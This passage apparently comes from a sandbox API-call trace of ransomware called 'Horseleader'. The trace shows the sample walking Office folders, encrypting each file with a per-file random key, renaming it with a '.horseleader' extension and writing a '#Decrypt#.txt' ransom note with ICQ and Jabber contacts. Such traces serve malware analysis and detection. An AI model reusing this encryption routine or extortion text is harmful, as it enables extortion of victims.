pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.581] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.583] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML") returned 114 [0244.583] StrStrW 
(lpFirst="Office32MUI.XML", lpSrch=".txt") returned 0x0 [0244.583] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=1383) returned 1 [0244.583] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x567, lpOverlapped=0x0) returned 1 [0244.585] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffffa99, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.585] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x567, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x567, lpOverlapped=0x0) returned 1 [0244.586] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.586] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.586] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.586] CloseHandle (hObject=0x15c) returned 1 [0244.586] GetProcessHeap () returned 0x780000 [0244.586] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.586] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.horseleader") returned 126 [0244.586] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\Office32.en-us\\Office32MUI.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\Office32MUI.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\office32mui.xml.horseleader")) returned 1 [0244.587] GetProcessHeap () returned 0x780000 [0244.587] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.587] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", cAlternateFileName="")) returned 1 [0244.588] lstrcmpiW (lpString1="SETUP.XML", lpString2="Windows") returned -1 [0244.588] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0244.588] StrStrIW (lpFirst="SETUP.XML", lpSrch=".horseleader") returned 0x0 [0244.588] lstrcmpW (lpString1="SETUP.XML", lpString2="#Decrypt#.txt") returned 1 [0244.588] lstrcmpW (lpString1="SETUP.XML", lpString2="_uninstalling_.png") returned 1 [0244.588] lstrlenW (lpString=".testttjffg") returned 11 [0244.588] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML", lpSrch=".testttjffg") returned 0x0 [0244.588] CryptGenRandom (in: 
hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.588] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.588] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.589] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML") returned 108 [0244.589] StrStrW (lpFirst="SETUP.XML", lpSrch=".txt") returned 0x0 [0244.589] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=2362) returned 1 [0244.589] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x93a, lpOverlapped=0x0) returned 1 [0244.591] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xfffff6c6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.591] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x93a, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x93a, lpOverlapped=0x0) returned 1 [0244.591] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.591] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | 
out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.592] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 [0244.592] CloseHandle (hObject=0x15c) returned 1 [0244.592] GetProcessHeap () returned 0x780000 [0244.592] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.592] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.horseleader") returned 120 [0244.592] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\SETUP.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\setup.xml.horseleader")) returned 1 [0244.593] GetProcessHeap () returned 0x780000 [0244.593] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.593] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc3e4630, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x19b82c30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfc3e4630, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x93a, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="SETUP.XML", 
cAlternateFileName="")) returned 0 [0244.593] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.593] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\#Decrypt#.txt") returned 112 [0244.593] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.en-us\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.en-us\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.595] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0244.596] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.597] lstrlenA (lpString="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") returned 1368 [0244.597] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.597] CloseHandle (hObject=0x1a4) returned 1 [0244.597] GetProcessHeap () returned 0x780000 [0244.597] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.597] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="Office32.WW", cAlternateFileName="")) returned 1 [0244.597] lstrcmpiW (lpString1="Office32.WW", lpString2="Windows") returned -1 [0244.597] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW") returned 95 [0244.597] lstrcmpW (lpString1="Office32.WW", lpString2=".") returned 1 [0244.597] lstrcmpW (lpString1="Office32.WW", lpString2="..") returned 1 [0244.597] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.597] 
GetProcessHeap () returned 0x780000 [0244.598] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.598] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*") returned 97 [0244.598] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.599] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\.") returned 97 [0244.599] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.599] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x22200730, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x22200730, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", cAlternateFileName="")) returned 1 [0244.599] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\..") returned 98 [0244.599] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0244.599] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0244.599] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 1 [0244.599] lstrcmpiW (lpString1="Office32WW.XML", lpString2="Windows") returned -1 [0244.599] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0244.599] StrStrIW (lpFirst="Office32WW.XML", lpSrch=".horseleader") returned 0x0 [0244.599] lstrcmpW (lpString1="Office32WW.XML", lpString2="#Decrypt#.txt") returned 1 [0244.599] lstrcmpW (lpString1="Office32WW.XML", lpString2="_uninstalling_.png") returned 1 [0244.599] lstrlenW (lpString=".testttjffg") returned 11 [0244.600] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML", lpSrch=".testttjffg") returned 0x0 [0244.600] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0244.600] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0244.600] CreateFileW (lpFileName="\\\\?\\C:\\Program 
Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0244.600] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML") returned 110 [0244.600] StrStrW (lpFirst="Office32WW.XML", lpSrch=".txt") returned 0x0 [0244.600] GetFileSizeEx (in: hFile=0x15c, lpFileSize=0x32ae8e0 | out: lpFileSize=0x32ae8e0*=4274) returned 1 [0244.600] ReadFile (in: hFile=0x15c, lpBuffer=0x32a9820, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesRead=0x32ae904*=0x10b2, lpOverlapped=0x0) returned 1 [0244.603] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0xffffef4e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0244.603] WriteFile (in: hFile=0x15c, lpBuffer=0x32a9820*, nNumberOfBytesToWrite=0x10b2, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32a9820*, lpNumberOfBytesWritten=0x32ae904*=0x10b2, lpOverlapped=0x0) returned 1 [0244.603] SetFilePointerEx (in: hFile=0x15c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0244.603] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae8d8*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae8d8*, lpNumberOfBytesWritten=0x32ae904*=0x4, lpOverlapped=0x0) returned 1 [0244.604] WriteFile (in: hFile=0x15c, lpBuffer=0x32ae820*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32ae904, lpOverlapped=0x0 | out: lpBuffer=0x32ae820*, lpNumberOfBytesWritten=0x32ae904*=0x80, lpOverlapped=0x0) returned 1 
[0244.604] CloseHandle (hObject=0x15c) returned 1 [0244.604] GetProcessHeap () returned 0x780000 [0244.604] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7de080 [0244.604] wnsprintfW (in: pszDest=0x7de080, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.horseleader") returned 122 [0244.604] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\Office32WW.XML.horseleader" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\office32ww.xml.horseleader")) returned 1 [0244.605] GetProcessHeap () returned 0x780000 [0244.605] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7de080 | out: hHeap=0x780000) returned 1 [0244.605] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfe09b760, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x22200730, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xfe09b760, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10b2, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="Office32WW.XML", cAlternateFileName="OFFICE~1.XML")) returned 0 [0244.605] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0244.605] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup 
Controller\\Office32.WW\\#Decrypt#.txt") returned 109 [0244.605] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\Office32.WW\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\office32.ww\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0244.609] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. \r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. 
\r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0244.609] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0244.611] lstrlenA (lpString="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") returned 1368 [0244.611] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0244.611] CloseHandle (hObject=0x1a4) returned 1 [0244.611] GetProcessHeap () returned 0x780000 [0244.611] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7e1110 | out: hHeap=0x780000) returned 1 [0244.611] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x49ce1216, dwReserved1=0x4f93752c, cFileName="OneNote.en-us", cAlternateFileName="ONENOT~1.EN-")) returned 1 [0244.611] lstrcmpiW (lpString1="OneNote.en-us", lpString2="Windows") returned -1 [0244.611] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us") returned 97 [0244.611] lstrcmpW (lpString1="OneNote.en-us", lpString2=".") returned 1 [0244.612] lstrcmpW (lpString1="OneNote.en-us", lpString2="..") returned 1 [0244.612] lstrcmpW 
(lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0244.612] GetProcessHeap () returned 0x780000 [0244.612] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7e1110 [0244.612] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*") returned 99 [0244.612] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0244.613] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0244.613] wnsprintfW (in: pszDest=0x7e1110, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\OneNote.en-us\\.") returned 99 [0244.613] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0244.613] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc840bb0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0xc8d9130, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xc8d9130, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe2373455, dwReserved1=0xc0f06c4f, cFileName="..", 
